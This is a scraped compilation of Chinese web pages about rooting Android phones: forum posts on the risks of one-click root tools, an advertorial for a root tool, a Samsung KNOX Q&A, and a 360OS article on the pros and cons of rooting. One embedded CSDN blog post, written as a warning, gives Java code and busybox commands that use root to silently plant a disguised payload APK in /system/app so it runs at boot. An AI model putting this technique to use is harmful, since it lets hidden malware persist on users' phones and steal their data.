后使用快捷导航没有帐号？
平板/笔记本
云服务专区
“一键ROOT”手机存在安全风险
&自成一派&
来自：浏览器
现今使用安卓手机进行ROOT的用户越来越多，很多用户都听过一句话，“无ROOT，不安卓”，ROOT手机不仅是为了更好控制手机的需要，也是很多人想要完成刷机的必要操作步骤，而其中最难防备以及控制的无疑就是手机上的一键ROOT，其他软件可以通过防御软件等进行扫描到恶意行为，而一键ROOT本身作为一个ROOT工具，拥有了隐蔽的权限，即便手机以被病毒侵入也无法扫描到。对于一些安卓用户来说,ROOT手机已经成为新购来手机的第一件事，难道就没有办法避免ROOT过程带来的风险吗？如何才能避免一键ROOT恶意软件侵害我们的手机，总结如下：1、不使用手机端一键ROOT，使用电脑端大品牌ROOT软件进行ROOT，如刷机精灵等ROOT破解工具2、不从来历不明渠道下载应用，下载应用一定要选择官方认证应用版本下载3、刷机时不刷入来历不明的ROM包，应下载带有ROM安全检测的ROM市场下载ROM，如ROM之家等4、使用手机需注意，当手机提示一些应用获取不需要的权限时应禁止，比如提示用户获取位置信息，短信权限等
荣耀7 世界有点不同
width:100%">
&已臻大成&
来自：浏览器
刷机都有风险
width:100%">
&神功盖世&
来自：浏览器
width:100%">
&神功盖世&
来自：浏览器
width:100%">
&花粉超级圈主&
来自：浏览器
width:100%">
&登堂入室&
来自：浏览器
！！！！！！！！
width:100%">
&炉火纯青&
来自：浏览器
小白root后也没什么用，只要手机不卡，尽量不要root，虽然可以有很多玩法，但root后系统可能会不稳定，还不保修
width:100%">
&热心花粉&
来自：浏览器
这个支持一下，不过非一键root操作起来麻烦一些。
width:100%">
&登峰造极&
来自：浏览器
鱼与熊掌不可兼得
width:100%">
申请成为热心花粉，满足热心花粉条件即可获得！http://cn./forum.php?mod=viewthread&tid=183642
关注华为花粉俱乐部微信公众平台——“华为花粉俱乐部”
好基友勋章
花粉好机友，注册时间大于99天
1000万花粉
纪念花粉俱乐部注册花粉数超过1000万
兴趣俱乐部十佳圈主荣誉勋章
相亲角人文随拍青岛之旅河北白石山细看世界鸣沙山随手拍大观公园之夏
花粉客户端
Make it Possible
Make your device special
华为云服务
Huawei cloud services
音乐播放器
Huawei Music
Huawei Vmall
成为了好友
更新了自己的基本资料
成为了好友
成为了好友
关注花粉俱乐部
联系我们：
|关注花粉俱乐部：
Copyright (C)
华为软件技术有限公司 版权所有 保留一切权利比特客户端
您的位置：
详解大数据
详解大数据
详解大数据
详解大数据
手机ROOT好处与风险并存 安全ROOT靠大师
关键字：其他
　　ROOT对于广大用户来说肯定不是一个陌生的名词。无论是你普通用户，还是一名热爱刷机、玩机的发烧友，都肯定对ROOT有所了解。
　　简单来讲，ROOT的意思就是获取最高权限。出于各种商业利益，你购买的新手机是没有ROOT权限的，但出厂手机或多或少自带一些推广软件，这些软件你并不想使用，但又删不掉，获取ROOT权限后就像Windows系统的高级管理员一样，手机里任何软件删掉，也可以随时禁止后台软件自启动。但随着安卓手机系统完善和发展，现在许多功可以在不ROOT的前提下实现。那么，对于今天来讲，ROOT是否真的重要呢？
　　ROOT大师安全专家告诉我们，根据去年移动安全实验室的数据，虽然日益强化的手机硬件和安卓5.0已经比较方便了，但ROOT手机的需求仍然较大。超过6成的用户获取ROOT是想卸载内置App，还有超过一半的用户是为了禁止自启动软件。如果想全方位掌握自己的手机，ROOT还是，只不过一定要使用安全稳定的ROOT软件，今天小编就推荐一款老牌ROOT软件：ROOT大师。
　　ROOT大师是耕耘手机ROOT技术最久的国内团队，早在安卓2.x时期就以一键ROOT闻名于各大安卓论坛中，经过几年锤炼发展，如今的ROOT大师已经是手机ROOT界的标杆产品，拥有ROOT专利技术，支持最多8000款安卓机型，成功服务海内外8000万用户的一键ROOT需求。以成功率高，操作简单便捷著称，新手小白也能使用ROOT大师完美ROOT手机：手机与电脑连接―打开ROOT大师―点击一键ROOT即可。
　　手机ROOT成功之后，手机桌面会生成一个叫授权管理的软件。利用授权管理才能禁止手机软件后台自动启动或完整删除不要的软件。同时，每当APP要获得手机的读取联系人、信息等重要权限的时候，授权管理都会提醒是否允许，这些都需要用户自行选择，合理的利用授权管理可以让你的手机更安全。至此，新买的安卓手机终于可以安心使用了。
　　ROOT大师官方下载：/vroot
[ 责任编辑：ran ]
去年，手机江湖里的竞争格局还是…
甲骨文的云战略已经完成第一阶段…
软件信息化周刊
比特软件信息化周刊提供以数据库、操作系统和管理软件为重点的全面软件信息化产业热点、应用方案推荐、实用技巧分享等。以最新的软件资讯，最新的软件技巧，最新的软件与服务业内动态来为IT用户找到软捷径。
商务办公周刊
比特商务周刊是一个及行业资讯、深度分析、企业导购等为一体的综合性周刊。其中，与中国计量科学研究院合力打造的比特实验室可以为商业用户提供最权威的采购指南。是企业用户不可缺少的智选周刊！
比特网络周刊向企业网管员以及网络技术和产品使用者提供关于网络产业动态、技术热点、组网、建网、网络管理、网络运维等最新技术和实用技巧，帮助网管答疑解惑，成为网管好帮手。
服务器周刊
比特服务器周刊作为比特网的重点频道之一，主要关注x86服务器，RISC架构服务器以及高性能计算机行业的产品及发展动态。通过最独到的编辑观点和业界动态分析，让您第一时间了解服务器行业的趋势。
比特存储周刊长期以来，为读者提供企业存储领域高质量的原创内容，及时、全面的资讯、技术、方案以及案例文章，力求成为业界领先的存储媒体。比特存储周刊始终致力于用户的企业信息化建设、存储业务、数据保护与容灾构建以及数据管理部署等方面服务。
比特安全周刊通过专业的信息安全内容建设，为企业级用户打造最具商业价值的信息沟通平台，并为安全厂商提供多层面、多维度的媒体宣传手段。与其他同类网站信息安全内容相比，比特安全周刊运作模式更加独立，对信息安全界的动态新闻更新更快。
新闻中心热点推荐
新闻中心以独特视角精选一周内最具影响力的行业重大事件或圈内精彩故事，为企业级用户打造重点突出，可读性强，商业价值高的信息共享平台；同时为互联网、IT业界及通信厂商提供一条精准快捷，渗透力强，覆盖面广的媒体传播途径。
云计算周刊
比特云计算周刊关注云计算产业热点技术应用与趋势发展，全方位报道云计算领域最新动态。为用户与企业架设起沟通交流平台。包括IaaS、PaaS、SaaS各种不同的服务类型以及相关的安全与管理内容介绍。
CIO俱乐部周刊
比特CIO俱乐部周刊以大量高端CIO沙龙或专题研讨会以及对明星CIO的深入采访为依托，汇聚中国500强CIO的集体智慧。旨为中国杰出的CIO提供一个良好的互融互通 、促进交流的平台，并持续提供丰富的资讯和服务，探讨信息化建设，推动中国信息化发展引领CIO未来职业发展。
IT专家新闻邮件长期以来，以定向、分众、整合的商业模式，为企业IT专业人士以及IT系统采购决策者提供高质量的原创内容，包括IT新闻、评论、专家答疑、技巧和白皮书。此外，IT专家网还为读者提供包括咨询、社区、论坛、线下会议、读者沙龙等多种服务。
X周刊是一份IT人的技术娱乐周刊，给用户实时传递I最新T资讯、IT段子、技术技巧、畅销书籍，同时用户还能参与我们推荐的互动游戏，给广大的IT技术人士忙碌工作之余带来轻松休闲一刻。
微信扫一扫
关注Chinabyte三星手机root完总出现 安全声明 怎么去掉？_百度知道
三星手机root完总出现 安全声明 怎么去掉？
问题暂时关闭
　　这个都是KNOX的问题，手机获取ROOT后，需要使用软件商店升级，打开就有一个禁用knox的选项，点击禁用即可，也可以选择卸载都可以把安全声明取消。　　KNOX，是三星的一款基于开源Android平台的安全解决方案，可以通过物理手段和软件体系相结合的方式全面增强了安全性，同时完美兼容安卓及谷歌生态系统，为企业及员工个人带来行业领先的企业移动安全解决方案。
建议你去论坛找大神帮你吧或者换个软件从新root试试市面上较为常见的通过软件就可以轻松的手机ROOT手机ROOT软件应应用宝还是很不错 的用宝首先您需要在手机中安装应用宝应用宝全新版本全新体验在应用宝中您可以享受众多手机使用功能刷机Root备份截屏等样样有更有手机优化功能玩转安卓手机从应用宝开始。
本回答被网友采纳
为您推荐：
其他类似问题
三星手机的相关知识
等待您来回答21738人阅读
android（52）
前提：你有一部已经root的android手机，并且手机中有busybox和superuser
导读：本文介绍一种简单的病毒以及如何“防御”。
写本博客的原因是：有无数用户觉得root没有什么风险，或者风险不会降临到自己头上。这里告诉大家，其实风险就在身边！
这里讲的内容其实对于大多数开发者都不是什么新鲜的事情了，使用的技术也非常一般和普遍。
虽然大家都知道可以这样这样，但是还是随意下载软件，不加小心，就会掉入陷阱。
有些人觉得，只要我下载软件的时候检查软件所申请的权限就好了，其实没有那么简单。
我们来看看如果一个软件，获得了一次root权限，那么它可以作些什么呢？
好吧，我们先来一次“静默安装”！
原理很简单，基本上相当于把apk push到手机里面，两个选择
system/app
如果我是病毒软件，我肯定选择push到system/app
我们需要制作两个apk，一个是真正目的的（病毒，real.apk），另一个是假的壳子（fake.apk）
首先先制作real.apk，我们只是用来测试，所以这个apk没有什么实际内容（由于这里无法上传附件，请移步到&/blog/1668734 下载real.apk）。
real.apk里有一个receiver，用来监听开机的广播
android.intent.action.BOOT_COMPLETED
还有一个activity，没有什么实质内容，然后编译出apk，待用。
下面来制作壳子
新建一个android工程，将之前的real.apk复制到assets目录下
然后新建一个activity来测试
这个壳子的很简单，它只负责把真实的应用安装到用户手机中，我们再细分一下，首先，将文件assets/real.apk提取出来，放到自己的私有目录中，在本例子中的目录为data/data/com.example.fake/files，这一步是不需要任何权限的
prepareButton.setOnClickListener(new View.OnClickListener() {
public void onClick(View v) {
File dataFolder = getFilesDir();
File jar = new File(dataFolder.getAbsolutePath() + &/real.apk&);
copyFile(&real.apk&, jar, mResources);
其中copFile函数见附件（就是一个简单的io读写操作），这里只给出伪代码
InputStream myInput =
myInput = resources.getAssets().open(filePath);
第一步已经完成了，下一步请求root权限，然后将real.apk恶意安装给用户。
这里需要使用到busybox，命令如下
busybox mount -o remount,rw /system
busybox cp /data/data/com.example.fake/files/real.apk /system/app/real.apk
busybox rm /data/data/com.example.fake/files/real.apk
之所以使用busybox，是因为手机里面可能没有mount、cp、rm等命令（我的手机里面就没有）
当然superuser需要同意你使用root权限
至此，你的入侵行为已经全部完成！
installButton.setOnClickListener(new View.OnClickListener() {
public void onClick(View v) {
String packageName = getPackageName();
String[] commands = {&busybox mount -o remount,rw /system&,
&busybox cp /data/data/& + packageName + &/files/real.apk /system/app/real.apk&,
&busybox rm /data/data/& + packageName + &/files/real.apk&};
Process process =
DataOutputStream dataOutputStream =
process = Runtime.getRuntime().exec(&su&);
dataOutputStream = new DataOutputStream(process.getOutputStream());
int length = commands.
for (int i = 0; i & i++) {
Log.e(TAG, &commands[& + i + &]:& + commands[i]);
dataOutputStream.writeBytes(commands[i] + &\n&);
dataOutputStream.writeBytes(&exit\n&);
dataOutputStream.flush();
process.waitFor();
} catch (Exception e) {
Log.e(TAG, &copy fail&, e);
} finally {
if (dataOutputStream != null) {
dataOutputStream.close();
process.destroy();
} catch (Exception e) {
重启手机之后，real.apk就能工作了，它会接收到开机广播
如果你嵌入了更恶劣的代码，比如偷发短信，窃取邮件，那么用户也是很难察觉的
real.apk在settings中会显示在系统应用中，用户不太会怀疑，即使怀疑了，他们也不敢轻易卸载！谁让他们自己随意刷rom呢，每个rom集成的软件都不一样。
如何防御？！
我不知道如何防御，最简单的办法就是，解压你来路不明的apk文件，看看assets文件下有没有什么可疑文件。当然，病毒可能会去掉或者修改文件名的后缀！
我手机中安装了卡巴斯基免费版，很可惜，它没有查出病毒（即使你的real.apk嵌入更恶意的代码）
大家可以试试其他杀毒软件，比如……希望大家能给个反馈结果
请大家不要用root的手机随意下载软件，更不要以任何借口制造任何病毒！
转贴请保留以下链接
本人blog地址
&&相关文章推荐
* 以上用户言论只代表其个人观点，不代表CSDN网站的观点或立场
访问：477873次
积分：6395
积分：6395
排名：第3764名
原创：100篇
译文：25篇
评论：344条
文章：26篇
阅读：97695
文章：22篇
阅读：57431
文章：12篇
阅读：127007
(1)(1)(1)(1)(1)(2)(2)(1)(1)(3)(2)(3)(7)(8)(2)(1)(4)(4)(5)(7)(6)(9)(10)(24)(15)(4)Android系统从面世以来，就以开源和开源的姿态赢得了巨大的市场。开源就意味着任何人可以修改系统，并将系统安装至任意设备上，无需为Google支付任何费用。即使姿态如此开放，Google及Android阵营的手机厂商依然有自己的一些小算盘——比如对于Google自家服务的代码，依然是不开源的；而为了保证一些用户体验的完整性及政策限制，厂家通常会对用户修改系统的操作进行一些限制。这时候，root这个词就横空出世了。依托root操作，用户可以随心所欲进行一些高阶操作，无需「寄人篱下」。但Android一直都有安全性的疑虑，因此，对于许多人来说，「root or not root,this is a question.」，本贴就将为你揭秘什么是root，以及该不该root。所以Root究竟是个什么鬼！很久很久以前，有一个国家，这个国家名叫做Android，这个国家的使命就是为国境线外的人——我们就称之为「使用者」吧——提供各种信息和服务。刚开始，这个国家是没有人民的，只有一个叫「root」的国王（实际上，基于Linux开发的操作系统的超级账户通常都是这个用户名）。但后来，他们的国王会接待到许多的移民，他们个个都有自己的本领。比如，有的移民能帮使用者聊天，有的能为使用者提供新闻资讯，有的还能提供影评。移民越来越多，但这个国家却没有乱套，因为国王为每个移民都登记了身份证。大家都遵守规矩，所有国民都在为使用者服务着。到了后来，使用者对介绍新移民的那个移民说，「以后我在你这里引入新的移民，能不能在后台安装？」那个移民就说，「我做不到呀，因为我不是国王。国王说，引入新移民必须要你知道才行。」使用者说了，「你伪造一下身份不就可以了？」然后，使用者就指使它假冒了身份证，说自己是国王，为新移民颁发了身份证，并在户口登记簿上登记了新移民的名字——这些原本应该是「国王」才能做的事情。所谓的「获取root权限」，就是这样的原理。在Android的沙盒机制之下，每一个app都对应系统中一个独立的账户，以保证app间数据及运行的独立。当某个app伪造成为root账户运行一个进程，那么这个app就获取到了root最高权限。Root好处都有啥？既然知道了root的基本原理，那么我们就可以看看费那么大劲获取的root权限到底有什么好处了。其实，root掉你手上的Android设备的好处还是很多的，包括但不限于：按照自己的意愿修改系统：如果说Android的root对应到iOS的越狱的话，那么Xposed就相当于是Cydia一类的存在了。使用Xposed，你可以安装各种插件，从更改系统外观，到修改应用程序参数，基本上Xposed都能满足你的各种欲望。比如，曾经我见过有人用Xposed框架double了自己微信运动的步数……
完全备份应用程序：由于国内的特殊情况，Google Play Services对于普通人来说并没有想象中那么好用，比如换手机之后，应用程序及其数据还要通过网络下载回来，如果里面再夹带几个游戏，整个人都要疯了。但是在root之后使用一些备份软件，比如钛备份，就能够在本地完全备份任意的应用程序（包括应用数据），不需要再从云端下载自己的应用以及里面的数据了
360换机APP却可以在不用联网的情况下对聊天记录和使用过的WiFi进行转移，还能够对隐私彻底粉碎，这有没有很方便呢。
卸载内置应用：许多厂商及运营商都会在相应的手机中内嵌一些app，这些app在出厂时就被写入为Android内置程序。而在root后就可以卸载一些内置应用。有关于卸载这类应用层出不穷，不过我们在此依然良心推荐使用钛备份的「冻结」功能，虽说是「冻结」，其实就是完全清理啦，用钛备份卸载内置应用，干净整洁不留痕。清理系统内存：众所周知，Android5.0之前的内存管理混乱情况简直让每一个Android用户都大呼崩溃。神说，要清理内存，于是，绿色守护就出现了。在许多Android玩家心目中，绿色守护简直就是清理内存的神器。root之后的绿色守护清理更快速、更彻底，还能配合Xposed实现许多高级功能
360OS自带卸载内置软件的功能，而且为了运行流畅，还推出了黑科技冷藏室，冻结了不常用软件，不再后台运行。
一般人有必要Root手机吗？如果一定要给这个问题给一个最为直接的答案，那么这个答案就是
「没有必要」。
实际上，Android系统的源码一直都是在进步的过程中，机制、功能和界面都已经是翻天覆地的变化。如果平常只是正常使用，或者只是使用以下功能，不root完全能够实现。
系统美化。在Android上，只需要用一些美化app就可以把系统打扮的美美哒，并不需要root的操作。360主题多种多样，想要什么类型，主题都能随心换。
截屏。Android4.0+之后，截屏操作只需要按住电源+音量减就可以了。
屏幕录制/屏幕直播。Android5.0开放了投屏API，apps只需要调用这个API，就可以将你的屏幕进行录制和直播。360手机都是支持 电源＋音量加 进行直接录屏，不再需要找软件，方便了太多。
不过，在不熟悉的情况下贸然root自己的手机，会对机器的稳定性及安全性造成严重威胁，包括：导致操作系统不稳定。
由于root账户几乎可以修改系统的任何部分，当用户意外修改了系统的某些重要区域，可能会导致系统无法正常运行，甚至设备损坏。root的操作本身就是Android不稳定的因素之一。
木马、流氓软件更易控制手机。root之后的Android中的沙箱机制会被弱化，导致软件可以控制整个系统。轻则「流量侧漏」或后台安装软件，严重的话，黑客强制锁机要求机主付费解锁手机的情况也不是没有。
隐私泄露风险增加。同样是因为沙箱的弱化，root后的设备中的加密数据更容易被其他应用获取，特别在Android中录入了指纹的情况——要知道，指纹数据一旦被破解，是不可逆的。
保修失效。root后保修失效是许多Android厂商限制用户root手机的手段之一。而且有些机型在root之前必须解除硬件锁或Bootloader锁，这个操作本身不可逆且执行后保修会失效
Root之后，如何最大程度保证设备安全？前面提到，root之后整个设备的安全性其实会大幅度降低，有些时候root可能是得不偿失。但是我们并不是没有解决办法。通过这些手段，设备及数据的安全性会提升许多层.
root后，最好将root管理软件切换到SuperSU。SuperSU是一个开源软件，所有人都可以看到源码中是否有恶意代码，但其他的root管理软件无法检查其源代码，有嵌入恶意代码的风险。为SuperSU添加一个授权密码。当SuperSU没有设置授权密码时，任何可以操作手机的人都可以为任何app进行授权。添加一个授权密码，保证手机被其他人拿到或被hack并远程控制之后，黑客获得root权限的门槛更高对请求root权限的软件多加小心。若软件提示的权限在仅用系统接口的前提下都可以完成（比如：录屏、读取通知、非全局性的主题修改等），建议不要为其提供root权限。定期检查root权限调用记录。发现有大量不正常的root权限调用记录，需要立即删除应用。当然，「安全」不仅是相对问题，更是一种习惯问题。拥有良好安全习惯的人即使系统本身不安全，他的隐私也不会有什么问题；习惯比较差的人，即使系统再固若金汤，也有隐私被盗的风险。简而言之……Root本质上是一种绕过系统沙箱机制及安全机制，达到修改系统及其他app目的的操作。Root操作本身风险很大，但是root后的设备能够充分发挥其个性化特性。合理使用root权限，可以帮助我们更好地利用自己的手机。用户应该在充分了解风险、能力和优劣势的前提下，根据自身情况，选择是否root自己的设备。若选择root自己的设备，也要养成良好的设备使用习惯，以保证设备及隐私安全。
在这里，我自己本身是不推荐root的，为什么360OS官方不会给出root，就是因为root后风险太多太多，一般玩机的人根本不需要root。root后会造成许多未知的不良后果。而且，在我们看来，一些功能360OS已经实现。
很多root过的用户会导致无法系统升级或者无法开机。那么很不幸的告诉你，你需要线刷升级，或者说你不能和其他用户一样收到推送升级。
<span class="tipso_style" id="tip-p" data-tipso='
您可以选择一种方式赞助本站
关于本站本站为360用户提供方便快捷的360产品问题解答信息，让我们理智客观的对待互联网信息。本站信息来源于互联网，如有侵权，请联系站长。